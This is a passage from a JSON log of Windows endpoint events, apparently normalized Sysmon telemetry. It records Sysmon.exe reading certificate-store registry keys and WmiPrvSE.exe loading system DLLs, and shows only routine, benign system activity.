"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "tapiperf.dll", - "image_path": "C:\\Windows\\System32\\tapiperf.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "perfctrs.dll", - "image_path": "C:\\Windows\\System32\\perfctrs.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "tquery.dll", - "image_path": "C:\\Windows\\System32\\tquery.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "cryptdll.dll", - "image_path": "C:\\Windows\\System32\\cryptdll.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - 